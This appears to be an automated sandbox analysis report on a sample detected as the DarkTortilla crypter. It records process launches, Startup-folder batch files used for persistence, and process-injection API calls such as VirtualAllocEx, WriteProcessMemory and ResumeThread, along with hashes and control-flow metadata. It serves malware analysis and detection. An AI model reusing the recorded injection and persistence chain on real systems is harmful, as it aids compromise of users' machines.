                                                Yara matches:
                                                • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:17:00:18
                                                Start date:09/08/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0xed0000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:8
                                                Start time:17:01:02
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:17:01:02
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:17:01:16
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:17:01:16
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:17:01:24
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uknphp3q7QNTU5S7JDQd395T.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:17:01:24
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:17:01:37
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7jqZT4DOBm3RwAn2PcA575yH.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:17:01:37
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:17:01:45
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aQqevjV3RV9JJaF7h5x7Exf9.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:17
                                                Start time:17:01:45
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:18
                                                Start time:17:01:53
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pltF0lsLekfh4Kak6kjaROUd.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:19
                                                Start time:17:01:53
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:20
                                                Start time:17:02:07
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aZULhs3yjKzrM4jdcsdY0pG.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:21
                                                Start time:17:02:07
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:22
                                                Start time:17:02:15
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPdKjWiyihutETqOInbK2Mh7.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:23
                                                Start time:17:02:15
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:18.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:9.4%
                                                  Total number of Nodes:96
                                                  Total number of Limit Nodes:6
                                                  execution_graph 53089 918cf98 53090 918cfdd Wow64GetThreadContext 53089->53090 53092 918d025 53090->53092 53093 918ded8 53094 918df20 VirtualProtectEx 53093->53094 53096 918df5e 53094->53096 53104 918e7b8 53105 918e943 53104->53105 53106 918e7de 53104->53106 53106->53105 53108 91866b8 53106->53108 53109 91866bf PostMessageW 53108->53109 53111 918eaa4 53109->53111 53111->53106 53127 918e3e8 53128 918e428 ResumeThread 53127->53128 53130 918e459 53128->53130 53131 9185868 53133 918588f 53131->53133 53132 91859fe 53133->53132 53135 91867ec 53133->53135 53136 91867f5 53135->53136 53137 9186c74 53136->53137 53139 91891e8 53136->53139 53137->53133 53141 918920f 53139->53141 53140 91892d3 53140->53136 53141->53140 53143 918b4c8 53141->53143 53144 918b547 CreateProcessAsUserW 53143->53144 53146 918b648 53144->53146 53147 918d668 53148 918d6a8 VirtualAllocEx 53147->53148 53150 918d6e5 53148->53150 53097 7229660 53098 72296a6 DeleteFileW 53097->53098 53100 72296df 53098->53100 53151 732af80 53153 732af94 53151->53153 53152 732b021 53153->53152 53162 9181b08 53153->53162 53166 9181b97 53153->53166 53170 9181ac4 53153->53170 53176 9182b5c 53153->53176 53181 9181a3b 53153->53181 53185 91826db 53153->53185 53189 918242a 53153->53189 53193 918230a 53153->53193 53163 9181ac5 53162->53163 53163->53162 53197 9183ff8 53163->53197 53200 9183ff0 53163->53200 53168 9183ff8 VirtualProtect 53166->53168 53169 9183ff0 VirtualProtect 53166->53169 53167 9181bab 53168->53167 53169->53167 53171 9181ac5 53170->53171 53172 9183ff8 VirtualProtect 53170->53172 53173 9183ff0 VirtualProtect 53170->53173 53174 9183ff8 VirtualProtect 53171->53174 53175 9183ff0 VirtualProtect 53171->53175 53172->53171 53173->53171 53174->53171 53175->53171 53177 9182b65 53176->53177 53179 9183ff8 VirtualProtect 53177->53179 53180 9183ff0 VirtualProtect 53177->53180 53178 9182b77 53179->53178 53180->53178 53183 9183ff8 VirtualProtect 53181->53183 53184 9183ff0 VirtualProtect 53181->53184 53182 918199f 53182->53153 53183->53182 53184->53182 53187 9183ff8 VirtualProtect 53185->53187 53188 9183ff0 VirtualProtect 53185->53188 53186 91826ee 53187->53186 53188->53186 53191 9183ff8 VirtualProtect 53189->53191 53192 9183ff0 VirtualProtect 53189->53192 53190 918243e 53191->53190 53192->53190 53195 9183ff8 VirtualProtect 53193->53195 53196 9183ff0 VirtualProtect 53193->53196 53194 918231b 53195->53194 53196->53194 53198 9184040 VirtualProtect 53197->53198 53199 918407a 53198->53199 53199->53163 53201 9184040 VirtualProtect 53200->53201 53202 918407a 53201->53202 53202->53163 53203 918e160 53204 918e1a5 Wow64SetThreadContext 53203->53204 53206 918e1ed 53204->53206 53207 918d9e0 53208 918da28 WriteProcessMemory 53207->53208 53210 918da7f 53208->53210 53101 732bf68 53102 732bfb0 VirtualProtect 53101->53102 53103 732bfea 53102->53103 53112 da07f0 53113 da080e 53112->53113 53114 da0818 53112->53114 53116 da0843 53113->53116 53117 da0866 53116->53117 53119 da0885 53116->53119 53122 da09c9 53117->53122 53125 da09d0 FindCloseChangeNotification 53117->53125 53118 da0881 53118->53114 53119->53114 53123 da09d0 FindCloseChangeNotification 53122->53123 53124 da0a37 53123->53124 53124->53118 53126 da0a37 53125->53126 53126->53118

                                                  Executed Functions

                                                  Function 07311C57 Relevance: 5.6, Instructions: 5643COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 7311c57-7311e9f 28 7311ea5-7312bea 0->28 29 7313ef4-73141da 0->29 437 7312bf0-7312ece 28->437 438 7312ed6-7313eec 28->438 104 73141e0-731518b 29->104 105 7315193-731620e 29->105 104->105 695 7316555-7316568 105->695 696 7316214-731654d 105->696 437->438 438->29 700 7316c15-7317aee call 73191f0 695->700 701 731656e-7316c0d 695->701 696->695 1083 7317af4-7317afb 700->1083 701->700
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649034695.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7310000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa0e0ea6fbea5e649bc5be379a554901e5dba8bc43197aaed54000e521d9ff1a
                                                  • Instruction ID: a8db191bd6a6406191c916a4b95929b1b42ea4d1c37c58bb7124eab1eacf5c2c
                                                  • Opcode Fuzzy Hash: aa0e0ea6fbea5e649bc5be379a554901e5dba8bc43197aaed54000e521d9ff1a
                                                  • Instruction Fuzzy Hash: 33C31A70A12228CFDB58EF39D9996ACBBB2BB89300F4045E9D049A7350DF349E85CF55
                                                  Function 07311C70 Relevance: 5.6, Instructions: 5633COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1085 7311c70-7311e9f 1113 7311ea5-7312bea 1085->1113 1114 7313ef4-73141da 1085->1114 1522 7312bf0-7312ece 1113->1522 1523 7312ed6-7313eec 1113->1523 1189 73141e0-731518b 1114->1189 1190 7315193-731620e 1114->1190 1189->1190 1780 7316555-7316568 1190->1780 1781 7316214-731654d 1190->1781 1522->1523 1523->1114 1785 7316c15-7317aee call 73191f0 1780->1785 1786 731656e-7316c0d 1780->1786 1781->1780 2168 7317af4-7317afb 1785->2168 1786->1785
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649034695.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7310000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a354790d60bd8cd2ff161a9105416473078cb225e274a9da4106e877c9aeffe0
                                                  • Instruction ID: d94096562617307c1c59557ac73f24d9fe5b12eb8677894e0fad2a44c03c46e9
                                                  • Opcode Fuzzy Hash: a354790d60bd8cd2ff161a9105416473078cb225e274a9da4106e877c9aeffe0
                                                  • Instruction Fuzzy Hash: 0AC31A70A12228CFDB58EF39D9996ACBBB2BB89300F4045E9D049A7350DF349E85CF55
                                                  Function 07221D58 Relevance: 5.2, Instructions: 5170COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3129 7221d58-7221fc6 4085 7221fc8 call 72284e0 3129->4085 4086 7221fc8 call 72284d1 3129->4086 3157 7221fce-7227423 call 7228b7f 4084 7227429-7227430 3157->4084 4085->3157 4086->3157
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648869261.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7220000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7e4a0bb8a7af2713226b1aead2de491ecf3579b6f65b07b7603a2a78cc1ec7e
                                                  • Instruction ID: 2c3d4b94f7f27d4ea8b51e5d2ed82f04834f52391b7c5494f6290bc3c0ae8052
                                                  • Opcode Fuzzy Hash: e7e4a0bb8a7af2713226b1aead2de491ecf3579b6f65b07b7603a2a78cc1ec7e
                                                  • Instruction Fuzzy Hash: B9B31C70A152588FCB18EF39E98969CBBF1BB89300F4095EAD488A3354DF349E85DF51
                                                  Function 073210ED Relevance: 3.2, Instructions: 3173COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4117 73210ed-7321174 4121 732126a-732126c 4117->4121 4122 732117a-7321262 4117->4122 4123 7321273-7321283 4121->4123 4124 732126e-7321271 4121->4124 4122->4121 4130 7321285-7321296 4123->4130 4131 7321298-73212a6 4123->4131 4126 73212b1-73227d9 4124->4126 4399 73227df-7322867 4126->4399 4400 73243fc 4126->4400 4130->4126 4765 73212a8 call 7324aa1 4131->4765 4766 73212a8 call 73249ab 4131->4766 4767 73212a8 call 732495f 4131->4767 4136 73212ae 4136->4126 4762 732286d call 7326890 4399->4762 4763 732286d call 7326880 4399->4763 4402 7324401-7324446 4400->4402 4405 7324488-73244a9 4402->4405 4406 7324448-7324477 4402->4406 4406->4405 4412 7322870-7322a79 4438 7322b98-7322c7e 4412->4438 4439 7322a7f-7322b93 4412->4439 4462 7322c81-7324159 4438->4462 4439->4462 4462->4402 4729 732415f-732417c call 73284df 4462->4729 4730 7324182-7324277 4729->4730 4730->4402 4740 732427d-7324282 4730->4740 4741 73242a1-7324389 4740->4741 4742 7324284-732429c 4740->4742 4741->4402 4758 732438b-73243c1 4741->4758 4743 73243c7-73243fb 4742->4743 4758->4743 4762->4412 4763->4412 4765->4136 4766->4136 4767->4136
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad4f27b0a10dd3ff6ca466b27b84d94050470717aeff2129ddd9d9cbde8ec035
                                                  • Instruction ID: 9143b1e5a162b12c8ff47a089914cd753d950990127e3f29af543754f90251b0
                                                  • Opcode Fuzzy Hash: ad4f27b0a10dd3ff6ca466b27b84d94050470717aeff2129ddd9d9cbde8ec035
                                                  • Instruction Fuzzy Hash: CF538CB4A152688BCB18FF78EC897ADBBB5BF89300F4045A9D448A7341DB34AD84CF55
                                                  Function 0918BA60 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4768 918ba60-918ba85 4769 918ba8c-918bac0 4768->4769 4770 918ba87 4768->4770 4772 918bac3 4769->4772 4770->4769 4773 918baca-918bae6 4772->4773 4774 918bae8 4773->4774 4775 918baef-918baf0 4773->4775 4774->4772 4774->4775 4776 918bbb8-918bbca 4774->4776 4777 918bc5b-918bc8e call 91843a0 4774->4777 4778 918bb5b-918bb85 4774->4778 4779 918bcf0-918bcf9 4774->4779 4780 918bbf5-918bbf8 4774->4780 4781 918baf5-918bb06 4774->4781 4782 918bc96-918bc9a 4774->4782 4783 918bc17-918bc2f 4774->4783 4784 918bccd-918bcd5 4774->4784 4785 918bbcf-918bbe1 4774->4785 4786 918bb20-918bb53 call 9188508 4774->4786 4787 918bbe6-918bbf0 4774->4787 4775->4779 4776->4773 4777->4782 4808 918bb98-918bb9f 4778->4808 4809 918bb87-918bb96 4778->4809 4796 918bc01-918bc12 4780->4796 4800 918bb0c-918bb1e 4781->4800 4801 918bcd7-918bcd9 4781->4801 4790 918bc9c-918bcab 4782->4790 4791 918bcad-918bcb4 4782->4791 4802 918bc31-918bc40 4783->4802 4803 918bc42-918bc49 4783->4803 4792 918bcdc-918bceb 4784->4792 4785->4773 4786->4778 4787->4773 4797 918bcbb-918bcc8 4790->4797 4791->4797 4792->4773 4796->4773 4797->4773 4800->4773 4801->4792 4806 918bc50-918bc56 4802->4806 4803->4806 4806->4773 4810 918bba6-918bbb3 4808->4810 4809->4810 4810->4773
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Q+(i$Q+(i
                                                  • API String ID: 0-3998099878
                                                  • Opcode ID: b3783f83f73e9cbe789b9053264dff6f8720d858901e6abb8cd5d0b97e4a422b
                                                  • Instruction ID: 77224d17c3567144c1ebe16cff062dcdedde3756960f11b448904a55c2cbddb5
                                                  • Opcode Fuzzy Hash: b3783f83f73e9cbe789b9053264dff6f8720d858901e6abb8cd5d0b97e4a422b
                                                  • Instruction Fuzzy Hash: B081F0B0E05218DFCB18DFA5C8946EEBBB2BF88344F24942AD426BB254DB345941CF54
                                                  Function 09184100 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4813 9184100-918411a 4814 918411c 4813->4814 4815 9184121-91841cc 4813->4815 4814->4815 4825 91841cf 4815->4825 4826 91841d6-91841f2 4825->4826 4827 91841fb-91841fc 4826->4827 4828 91841f4 4826->4828 4829 9184368-918436e 4827->4829 4828->4825 4828->4827 4828->4829 4830 9184201-9184205 4828->4830 4831 9184251-9184292 call 9185810 4828->4831 4832 9184235-918424f 4828->4832 4833 91842a5-91842aa 4828->4833 4834 9184218-918421f 4830->4834 4835 9184207-9184216 4830->4835 4846 9184298-91842a0 4831->4846 4832->4826 4837 91842b5-9184335 4833->4837 4836 9184226-9184233 4834->4836 4835->4836 4836->4826 4850 9184348-918434f 4837->4850 4851 9184337-9184346 4837->4851 4846->4826 4852 9184356-9184363 4850->4852 4851->4852 4852->4826
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Q!$Q!
                                                  • API String ID: 0-2963764794
                                                  • Opcode ID: 05e18daa06a7653269469e7d09f7cffe9c1014b6cdd34b8faded2515e3b6f91e
                                                  • Instruction ID: 7488e9f9b165745003084d69bc16b501967d09cd963f6e6cdddd1f748b006647
                                                  • Opcode Fuzzy Hash: 05e18daa06a7653269469e7d09f7cffe9c1014b6cdd34b8faded2515e3b6f91e
                                                  • Instruction Fuzzy Hash: AF71F4B4E04209DFDB48DFA6D5856AEBFB2FF88340F20812AE84AA7355DB305945CF51
                                                  Function 0918B4C8 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4937 918b4c8-918b553 4939 918b55e-918b565 4937->4939 4940 918b555-918b55b 4937->4940 4941 918b570-918b588 4939->4941 4942 918b567-918b56d 4939->4942 4940->4939 4943 918b599-918b646 CreateProcessAsUserW 4941->4943 4944 918b58a-918b596 4941->4944 4942->4941 4946 918b648-918b64e 4943->4946 4947 918b64f-918b6ce 4943->4947 4944->4943 4946->4947 4954 918b6e0-918b6e7 4947->4954 4955 918b6d0-918b6d6 4947->4955 4956 918b6e9-918b6f8 4954->4956 4957 918b6fe 4954->4957 4955->4954 4956->4957
                                                  APIs
                                                  • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0918B633
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: CreateProcessUser
                                                  • String ID:
                                                  • API String ID: 2217836671-0
                                                  • Opcode ID: 59f7822c1c0ebb9ffea0f8943853c5c5bf66de2a9324c2c75e96d6ade8a0bdb2
                                                  • Instruction ID: 54d82babfcf69cd57c35c9b27400bee80a6b6c45cd9b86929788f290eb388c0c
                                                  • Opcode Fuzzy Hash: 59f7822c1c0ebb9ffea0f8943853c5c5bf66de2a9324c2c75e96d6ade8a0bdb2
                                                  • Instruction Fuzzy Hash: D35126B1D00229DFDB24DF99C840BDEBBB1BF48304F1480AAE918B7250DB759A85DF90
                                                  Function 0732BEA0 Relevance: 1.7, APIs: 1, Instructions: 153memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4959 732bea0-732bed0 4960 732bed2-732beee 4959->4960 4961 732be90-732be92 4959->4961 4962 732bef0-732bf11 4960->4962 4963 732bf12-732bf38 4962->4963 4963->4962 4964 732bf3a-732bf60 4963->4964 4964->4963 4965 732bf62-732bfe8 VirtualProtect 4964->4965 4968 732bff1-732c012 4965->4968 4969 732bfea-732bff0 4965->4969 4969->4968
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0732BFDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 8249f4120b71447a534baa46e945384e7619e5c9aad8d5579354a68f7e36954b
                                                  • Instruction ID: 8c0ac0bd6517efe9f24662cff9036ada6f469d3cec72c0d33e458705c7d7afc6
                                                  • Opcode Fuzzy Hash: 8249f4120b71447a534baa46e945384e7619e5c9aad8d5579354a68f7e36954b
                                                  • Instruction Fuzzy Hash: 3A51DE765483CA6EDB12CB79D4906EAFFF0AF0A310F28909AD4D897242D3305656EF90
                                                  Function 091840F0 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Q!
                                                  • API String ID: 0-1344094416
                                                  • Opcode ID: 81ec06c3fb929e1228183375482363c0bf2b012ab9f802686ea6073f80e2e1c1
                                                  • Instruction ID: a9d79302eb043d9a8be2ca7bc93bb0e3b9900533551e5bd122394a80196afdd3
                                                  • Opcode Fuzzy Hash: 81ec06c3fb929e1228183375482363c0bf2b012ab9f802686ea6073f80e2e1c1
                                                  • Instruction Fuzzy Hash: 13710574E04209DFDB48DFA5D9856AEBFB2FF88340F20802AE84AA7355DB305945CF51
                                                  Function 0732B048 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: <
                                                  • API String ID: 0-4251816714
                                                  • Opcode ID: a89e95f09a5b4d2c7be7d5b493891045402809a29302d37dbe705fce0110dcfe
                                                  • Instruction ID: 80de34397a0feb6c07949e54e6e43e061487c91cafa4716aa1b821c4050f0ff8
                                                  • Opcode Fuzzy Hash: a89e95f09a5b4d2c7be7d5b493891045402809a29302d37dbe705fce0110dcfe
